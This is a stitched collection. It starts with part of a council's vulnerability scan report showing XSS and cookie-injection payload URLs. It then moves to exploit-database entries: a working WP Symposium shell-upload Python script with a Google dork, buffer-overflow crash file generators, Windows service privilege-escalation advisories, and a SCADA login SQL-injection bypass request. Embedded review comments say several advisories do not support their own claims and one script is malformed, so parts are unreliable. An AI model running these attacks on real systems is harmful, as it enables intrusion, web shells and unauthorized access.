m=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
Tonbridge & Malling Borough Council
Vulnerabilities Report | 5
a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&search=&order_by=&order_by=504%20onerror="alert
(504);&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=504 o
nerror="alert(504);&sort=&archive=&k=">< Back to resource view</
a>
­­­­­­­­­­­­­­­­­­­­­­­­
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=504%20onerror="alert(504);
/pages/preview.php?order_by=504%20onerror="alert(504);
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
----------------------------------------------------------------------------------------------------
Vulnerability: 49067
Name: CGI Generic HTML Injections (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML to be executed
inuser's browser within the security context of the affected site.
The remote web server may be vulnerable to IFRAME injections or
cross­site scripting attacks :
­ IFRAME injections allow 'virtual defacement' that
might scare or anger gullible users. Such injections
are sometimes implemented for 'phishing' attacks.
­ XSS are extensively tested by four other scripts.
­ Some applications (e.g. web forums) authorize a subset
of HTML without any ill effect. In this case, ignore
this warning.
Solution
Either restrict access to the vulnerable application or contact the
vendor for an update.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to HTML injection :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>
­­­­­­­­ output ­­­­­­­­
a
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<"jfunqd%20>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=DESC&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<"jfunqd%20>&search=&order_by=&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<"jfunqd >&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=&search=&order_by=<"jfunqd%20>&from=
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<"jfu
nqd >&sort=&archive=&k=">< Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
Clicking directly on these URLs should exhibit the issue :
(you will probably need to read the HTML source)
/pages/preview.php?sort=<"jfunqd%20>
/pages/preview.php?order_by=<"jfunqd%20>
References
CWE: 80
CWE: 86
---------------------------------------------------------------------------------------------------
Vulnerability: SC­1628
Name: SSL cookie without secure flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
If the secure flag is not set, then the cookie will be transmitted in
clear­text if the user visits any non SSL
(HTTP) URLs within the cookie's scope.
Solution
The secure flag should be set on all cookies that are used for
transmitting sensitive data when accessing
content over HTTPS.
If cookies are used to transmit session tokens, then areas of the
application that are accessed over HTTPS
should employ their own session handling mechanism, and the session
tokens used should never be
transmitted over unencrypted communications.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT
URI: /pages/search.php
Other Info: display=thumbs; httponly
URI: /pages/themes.php
Other Info: saved_themes_order_by=name; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:08 GMT; httponly
URI: /pages/user_password.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:30 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:53:07 GMT; httponly
URI: /pages/user_request.php
Other Info: starsearch=deleted; expires=Tue, 12­Nov­2013 01:54:25 GMT; httponly
-------------------------------------------------------------------------------
Vulnerability: 44136
Name: CGI Generic Cookie Injection Scripting
Type: CGI abuses
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts at least one CGI script that fails to
adequately sanitize request strings with malicious JavaScript.
By leveraging this issue, an attacker may be able to inject arbitrary
cookies. Depending on the structure of the web application, it may be
possible to launch a 'session fixation' attack using this mechanism.
Please note that :
­ Nessus did not check if the session fixation attack is
feasible.
­ This is not the only vector of session fixation.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cookie manipulation :
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<script>document.cookie="testshay=5812;"</script
>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=<script>document.cookie="testshay=5812;"</
script>
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<script>document.cookie="testshay=5812;"</script>&archive=&k="><&nbs
p;Back to resource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
References
CWE: 472
CWE: 642
CWE: 715
CWE: 722
--------------------------------------------------------------------------------------------
Vulnerability: 39466
Name: CGI Generic XSS (quick test)
Type: CGI abuses : XSS
Asset Group: Multiple
Source: SureCloud Vulnerability Scan
IP Address:
Status: Open
Hostname:
Last Seen: 11 Nov 2014
Service: tcp/www:443
Severity: 3
Risk: 30
CVSS Base Score: 5.0
Description
The remote web server hosts CGI scripts that fail to adequately sanitize
request strings with malicious JavaScript. By leveraging this issue,
an attacker may be able to cause arbitrary HTML and script code
to be executed in a user's browser within the security context of the
affected site.
These XSS are likely to be 'non persistent' or 'reflected'.
Solution
Restrict access to the vulnerable application. Contact the vendor
for a patch or upgrade.
Information
Using the GET HTTP method, Nessus found that :
+ The following resources may be vulnerable to cross­site scripting
(quick+ The 'order_by' parameter of the /pages/preview.php CGI :
/pages/preview.php?order_by=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
test) :
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?order_by=&order_by=<IMG%20SRC="javascript:alert(104);
">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=<IMG
SRC="javascript:alert(104);">&sort=DESC&archive=&k=">< Back to r
esource view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
+ The 'sort' parameter of the /pages/preview.php CGI :
/pages/preview.php?sort=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
/pages/preview.php?sort=&sort=<IMG%20SRC="javascript:alert(104);">
­­­­­­­­ output ­­­­­­­­
<p style="margin:7px 0 7px 0;padding:0;"><a class="enterLink" href="
/pages/view.php?ref=&search=&offset=&order_by=&sort
=<IMG SRC="javascript:alert(104);">&archive=&k=">< Back to resou
rce view</a>
­­­­­­­­­­­­­­­­­­­­­­­­
References
CWE: 116
CWE: 20
CWE: 442
CWE: 692
CWE: 712
CWE: 722
CWE: 725
CWE: 74
CWE: 751
CWE: 79
CWE: 80
CWE: 801
CWE: 81
CWE: 811
CWE: 83
CWE: 86
--------------------------------------------------------------------------------------------------------------
Also issues to be aware of:
Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/https:443
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by client­side
JavaScript.
HttpOnly prevent certain client­side attacks, such as Cross Site
Scripting (XSS), from capturing the cookies
value via an injected script. When HttpOnly is set, script access to
document.cookie results in a blank string
being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting ­ any XSS
vulnerabilities identified must still be fixed.
Information
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:11 GMT
-------------------------------------------------------------------------------
Vulnerability: SC­1629
Name: Cookie without HttpOnly flag set
Type: Web Servers
Asset Group: Multiple
Source: SureCloud
IP Address:
Status: Open
Hostname:
Last Seen: 12 Nov 2014
Service: tcp/http:80
Severity: 3
Risk: 30
CVSS Base Score: 6.4 ( Exploit: 10.0 Impact: 4.9 )
Resolution Effort: 1
Description
When the HttpOnly attribute is set on a cookie, then the cookies
value cannot be read or set by client­side JavaScript.
HttpOnly prevent certain client­side attacks, such as Cross Site
Scripting (XSS), from capturing the cookies value via an injected
script. When HttpOnly is set, script access to document.cookie results
in a blank string being returned.
Solution
HttpOnly can safely be set for all Cookie values, unless the
application has a specific need for Script access
to cookie contents (which is highly unusual).
Please note also that HttpOnly does not mitigate against all dangers
of Cross Site Scripting ­ any XSS vulnerabilities identified must
still be fixed.
Information
URI: /pages/collection_share.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:42 GMT
URI: /pages/contactsheet_settings.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:38 GMT
URI: /pages/help.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:53:05 GMT
URI: /pages/preview.php
Other Info: thumbs=hide; expires=Tue, 08­Aug­2017 01:57:55 GMT
URI: /pages/resource_email.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:42 GMT
URI: /pages/view.php
Other Info: thumbs=show; expires=Tue, 08­Aug­2017 01:57:45 GMT

210
platforms/php/webapps/35543.txt Executable file

@ -0,0 +1,210 @@
#!/usr/bin/python
#
# Exploit Name: Wordpress WP Symposium 14.11 Shell Upload Vulnerability
#
#
# Vulnerability discovered by Claudio Viviani
#
# Exploit written by Claudio Viviani
#
#
# 2014-11-27: Discovered vulnerability
# 2014-12-01: Vendor Notification (Twitter)
# 2014-12-02: Vendor Notification (Web Site)
# 2014-12-04: Vendor Notification (E-mail)
# 2014-12-11: No Response/Feedback
# 2014-12-11: Published
#
# Video Demo + Fix: https://www.youtube.com/watch?v=pF8lIuLT6Vs
#
# --------------------------------------------------------------------
#
# The upload function located on "/wp-symposium/server/file_upload_form.php " is protected:
#
# if ($_FILES["file"]["error"] > 0) {
# echo "Error: " . $_FILES["file"]["error"] . "<br>";
# } else {
# $allowedExts = ','.get_option(WPS_OPTIONS_PREFIX.'_image_ext').','.get_option(WPS_OPTIONS_PREFIX.'_doc_ext').','.get_option(WPS_OPTIONS_PREFIX.'_video_ext');
# //echo "Upload: " . $_FILES["file"]["name"] . "<br>";
# $ext = pathinfo($_FILES["file"]["name"], PATHINFO_EXTENSION);
# //echo "Extension: " . $ext . "<br />";
# if (strpos($allowedExts, $ext)) {
# $extAllowed = true;
# } else {
# $extAllowed = false;
# }
# //echo "Type: " . $_FILES["file"]["type"] . "<br>";
# //echo "Size: " . ($_FILES["file"]["size"] / 1024) . " kB<br>";
# //echo "Stored in: " . $_FILES["file"]["tmp_name"];
#
# if (!$extAllowed) {
# echo __('Sorry, file type not allowed.', WPS_TEXT_DOMAIN);
# } else {
# // Copy file to tmp location
# ...
# ...
# ...
#
# BUTTTTT "/wp-symposium/server/php/index.php" is not protected and "/wp-symposium/server/php/UploadHandler.php" allow any extension
#
# The same vulnerable files are locate in "/wp-symposium/mobile-files/server/php/"
#
# ---------------------------------------------------------------------
#
# Dork google: index of "wp-symposium"
#
#
# Tested on BackBox 3.x with python 2.6
#
# Http connection
import urllib, urllib2, socket
#
import sys
# String manipulator
import string, random
# Args management
import optparse
# File management
import os, os.path, mimetypes
# Check url
def checkurl(url):
if url[:8] != "https://" and url[:7] != "http://":
print('[X] You must insert http:// or https:// procotol')
sys.exit(1)
else:
return url
# Check if file exists and has readable
def checkfile(file):
if not os.path.isfile(file) and not os.access(file, os.R_OK):
print '[X] '+file+' file is missing or not readable'
sys.exit(1)
else:
return file
# Get file's mimetype
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def id_generator(size=6, chars=string.ascii_uppercase + string.ascii_lowercase + string.digits):
return ''.join(random.choice(chars) for _ in range(size))
# Create multipart header
def create_body_sh3ll_upl04d(payloadname, randDirName, randShellName):
getfields = dict()
getfields['uploader_uid'] = '1'
getfields['uploader_dir'] = './'+randDirName
getfields['uploader_url'] = url_symposium_upload
payloadcontent = open(payloadname).read()
LIMIT = '----------lImIt_of_THE_fIle_eW_$'
CRLF = '\r\n'
L = []
for (key, value) in getfields.items():
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"' % key)
L.append('')
L.append(value)
L.append('--' + LIMIT)
L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % ('files[]', randShellName+".php"))
L.append('Content-Type: %s' % get_content_type(payloadname))
L.append('')
L.append(payloadcontent)
L.append('--' + LIMIT + '--')
L.append('')
body = CRLF.join(L)
return body
banner = """
___ ___ __
| Y .-----.----.--| .-----.----.-----.-----.-----.
|. | | _ | _| _ | _ | _| -__|__ --|__ --|
|. / \ |_____|__| |_____| __|__| |_____|_____|_____|
|: | |__|
|::.|:. |
`--- ---'
___ ___ _______ _______ __
| Y | _ |______| _ .--.--.--------.-----.-----.-----|__.--.--.--------.
|. | |. 1 |______| 1___| | | | _ | _ |__ --| | | | |
|. / \ |. ____| |____ |___ |__|__|__| __|_____|_____|__|_____|__|__|__|
|: |: | |: 1 |_____| |__|
|::.|:. |::.| |::.. . |
`--- ---`---' `-------'
Wp-Symposium
Sh311 Upl04d Vuln3r4b1l1ty
v14.11
Written by:
Claudio Viviani
http://www.homelab.it
info@homelab.it
homelabit@protonmail.ch
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
"""
commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME.PHP [--timeout sec]')
commandList.add_option('-t', '--target', action="store",
help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
)
commandList.add_option('-f', '--file', action="store",
help="Insert file name, ex: shell.php",
)
commandList.add_option('--timeout', action="store", default=10, type="int",
help="[Timeout Value] - Default 10",
)
options, remainder = commandList.parse_args()
# Check args
if not options.target or not options.file:
print(banner)
commandList.print_help()
sys.exit(1)
payloadname = checkfile(options.file)
host = checkurl(options.target)
timeout = options.timeout
print(banner)
socket.setdefaulttimeout(timeout)
url_symposium_upload = host+'/wp-content/plugins/wp-symposium/server/php/'
content_type = 'multipart/form-data; boundary=----------lImIt_of_THE_fIle_eW_$'
randDirName = id_generator()
randShellName = id_generator()
bodyupload = create_body_sh3ll_upl04d(payloadname, randDirName, randShellName)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36',
'content-type': content_type,
'content-length': str(len(bodyupload)) }
try:
req = urllib2.Request(url_symposium_upload+'index.php', bodyupload, headers)
response = urllib2.urlopen(req)
read = response.read()
if "error" in read or read == "0" or read == "":
print("[X] Upload Failed :(")
else:
print("[!] Shell Uploaded")
print("[!] Location: "+url_symposium_upload+randDirName+randShellName+".php\n")
except urllib2.HTTPError as e:
print("[X] "+str(e))
except urllib2.URLError as e:
print("[X] Connection Error: "+str(e))


@ -0,0 +1,24 @@
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.m3u)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E508
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E4A4
EBP 0012E4F4
ESI 0012E508
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.m3u",'w')
f.write(buffer + nseh + seh + junk)
f.close()
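Review bot: The register dump (`EAX 0012E508` through `EDI 00000000`) sits between the header comments and the `#!/usr/bin/python` line without a `#` prefix, so if this file is the Python script it appears to be, the interpreter stops on the first dump line before reaching the generator code; prefix each dump line with `# ` or move the block under a comment header. The same layout appears in the .lst variant (`EAX 0012E788` …) and in the jaangle PoC (`EAX 000000C0` … `FCW 027F …`), which also places the shebang after the dump. The `Date: 11/29/2010` header looks inconsistent with version 0.8.33 build 5680 and with this author's other December 2014 submissions; worth confirming before publication. Stating the MediaCoder version the crash was reproduced on, and on which OS, would also make the register dump useful to a reader.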


@ -0,0 +1,25 @@
# Exploit Title: Mediacoder 0.8.33 build 5680 SEH Buffer Overflow Exploit Dos (.lst)
# Date: 11/29/2010
# Author: Hadji Samir s-dz@hotmail.fr
# Software Link: http://dl.mediacoderhq.com/files001/MediaCoder-0.8.33.5680.exe
# Version: 0.8.33 build 5680
EAX 0012E788
ECX 43434343
EDX 00000000
EBX 43434343
ESP 0012E724
EBP 0012E774
ESI 0012E788
EDI 00000000
#!/usr/bin/python
buffer = ("http://" + "A" * 845)
nseh = ("B" * 4)
seh = ("C" * 4)
junk = ("D" * 60)
f= open("exploit.lst",'w')
f.write(buffer + nseh + seh + junk)
f.close()


@ -0,0 +1,47 @@
# jaangle 0.98i.977 Denial of Service Vulnerability
# Author: hadji samir , s-dz@hotmail.fr
# Download : http://www.jaangle.com/downloading?block
# Tested : Windows 7 (fr)
# DATE : 2012-12-13
#
###################################################################
EAX 000000C0
ECX 00000000
EDX 00000000
EBX 00000003
ESP 01C5FE28
EBP 01C5FF88
ESI 00000002
EDI 002B4A98
EIP 776964F4 ntdll.KiFastSystemCallRet
C 0 ES 0023 32bit 0(FFFFFFFF)
P 1 CS 001B 32bit 0(FFFFFFFF)
A 0 SS 0023 32bit 0(FFFFFFFF)
Z 0 DS 0023 32bit 0(FFFFFFFF)
S 0 FS 003B 32bit 7FFDC000(8000)
T 0 GS 0000 NULL
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00000206 (NO,NB,NE,A,NS,PE,GE,G)
ST0 empty g
ST1 empty g
ST2 empty g
ST3 empty g
ST4 empty g
ST5 empty g
ST6 empty g
ST7 empty g
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
#!/usr/bin/python
buff = ("\x41" * 30000 )
f = open("exploit.m3u",'w')
f.write( buff )
f.close()


@ -0,0 +1,38 @@
# Exploit Title: HTCSyncManager 3.1.33.0 (HSMServiceEntry.exe) Service Trusted Path Privilege Escalation
# Date: 12/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.htc.com/fr/software/htc-sync-manager/
#Affected version: 3.1.33.0
#Tested on: Windows 7 (FR)
HTC Synchronisation manager for devices HTC
Vulnerability Details
There are weak permissions for 'HTCSyncManager'default installation where everyone is allowed to change
the HSMServiceEntry.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
C:\Users\samir>sc qc HTCMonitorService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: HTCMonitorService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : HTCMonitorService
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe"
C:\Program Files\HTC\HTC Sync Manager\HSMServiceEntry.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers
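Review bot: The claim in 'Vulnerability Details' that everyone is allowed to replace `HSMServiceEntry.exe` is not supported by the evidence that follows: the `icacls` output grants (F) only to `AUTORITE NT\Système` and `BUILTIN\Administrateurs`, `BUILTIN\Utilisateurs` has only (RX), and the `BINARY_PATH_NAME` is quoted, so neither a weak-ACL nor an unquoted-path condition is visible. Either the output showing a writable ACL for Users or Everyone is missing from the advisory, or the finding should be reconsidered. The advisory would also benefit from a sentence stating how the weak permission was verified, since the title ("Service Trusted Path") and the body (file permissions) describe two different issues.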


@ -0,0 +1,37 @@
# Exploit Title: Avira 14.0.7.342 (avguard.exe) Service Trusted Path Privilege Escalation
# Date: 11/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.avira.com/
#Affected version: 14.0.7.342
#Tested on: Windows 7 (FR)
Avira free antivirus 14.0.7.342
(avguard.exe)
Avira free antivirus 14.0.7.342 contains a flaw in the 'avguard.exe' file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc AntiVirService
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: AntiVirService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Avira Real-Time Protection
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\Avira\AntiVir Desktop\avguard.exe"
C:\Program Files\Avira\AntiVir Desktop\avguard.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers
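Review bot: The description states an unquoted search path, but the `BINARY_PATH_NAME` shown is quoted (`"C:\Program Files\Avira\AntiVir Desktop\avguard.exe"`), and the `icacls` output shows only SYSTEM and Administrators with (F) and Users with (RX); neither piece of evidence supports the stated flaw. The advisory should either show the service configuration that actually exhibits the unquoted path or be reconsidered before it is published as a privilege-escalation finding.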


@ -0,0 +1,41 @@
# Exploit Title:CodeMeter 4.50.906.503 Service Trusted Path Privilege Escalation
# Date: 07/12/2014
#Author: Hadji Samir s-dz@hotmail.fr
#Product web page: http://www.wibu.com/fr/codemeter.html
#Affected version: 4.50.906.503
#Tested on: Windows 7 (FR)
'CodeMeter.exe '
CodeMeter represents the basic technology of all protection and licensing solutions from Wibu-Systems.
CodeMeter contains a flaw in the 'CodeMeter.exe'
file that may reportedly allow gaining access to unauthorized privileges.
The issue is due to an unquoted search path, which may allow a local attacker
to inject arbitrary code in the root path.
C:\Users\samir>sc qc CodeMeter.exe
[SC] QueryServiceConfig réussite(s)
SERVICE_NAME: CodeMeter.exe
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : CodeMeter Runtime Server
DEPENDENCIES : Tcpip
: Winmgmt
SERVICE_START_NAME : LocalSystem
C:\Users\samir>icacls "C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe"
C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe AUTORITE NT\Système:(I)(F)
BUILTIN\Administrateurs:(I)(F)
BUILTIN\Utilisateurs:(I)(RX)
1 fichiers correctement traités ; échec du traitement de 0 fichiers
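Review bot: Here the `BINARY_PATH_NAME` is indeed unquoted and contains a space (`C:\Program Files\CodeMeter\Runtime\bin\CodeMeter.exe`), but the `icacls` output on the executable itself does not bear on that class of issue: an unquoted path is only a privilege-escalation concern if a non-administrative user can create files in one of the intermediate directories, not if the final binary is writable. The advisory should document that check for the directories on the path, or state that the default ACLs on those directories prevent it, in which case the severity is lower than the title implies. The same evidentiary gap applies to the HTC and Avira write-ups in this commit.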


@ -0,0 +1,63 @@
?
Soitec SmartEnergy 1.4 SCADA Login SQL Injection Authentication Bypass Exploit
Vendor: Soitec
Product web page: http://www.soitec.com
Affected version: 1.4 and 1.3
Summary: Soitec power plants are a profitable and ecological investment
at the same time. Using Concentrix technology, Soitec offers a reliable,
proven, cost-effective and bankable solution for energy generation in the
sunniest regions of the world. The application shows how Concentrix technology
works on the major powerplants managed by Soitec around the world. You will
be able to see for each powerplant instantaneous production, current weather
condition, 3 day weather forecast, Powerplant webcam and Production data history.
Desc: Soitec SmartEnergy web application suffers from an authentication bypass
vulnerability using SQL Injection attack in the login script. The script fails
to sanitize the 'login' POST parameter allowing the attacker to bypass the security
mechanism and view sensitive information that can be further used in a social
engineering attack.
Tested on: nginx/1.6.2
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Vendor status:
[16.11.2014] Vulnerability discovered.
[02.12.2014] Vendor contacted.
[08.12.2014] Vendor responds asking more details.
[08.12.2014] Sent details to the vendor.
[09.12.2014] Vendor confirms the vulnerability.
[12.12.2014] Vendor applies fix to version 1.4.
[14.12.2014] Coordinated public security advisory released.
Advisory ID: ZSL-2014-5216
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5216.php
16.11.2014
---
POST /scada/login HTTP/1.1
Host: smartenergy.soitec.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://smartenergy.soitec.com/scada/login
Cookie: csrftoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY; _ga=GA1.2.658394151.1416124715; sessionid=ixi3w5s72yopc29t9ewrxwq15lzb7v1e
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 87
csrfmiddlewaretoken=ygUcdD2i1hFxUM6WpYB9kmrWqFhlnSBY&login=%27+or+1%3D1--&password=blah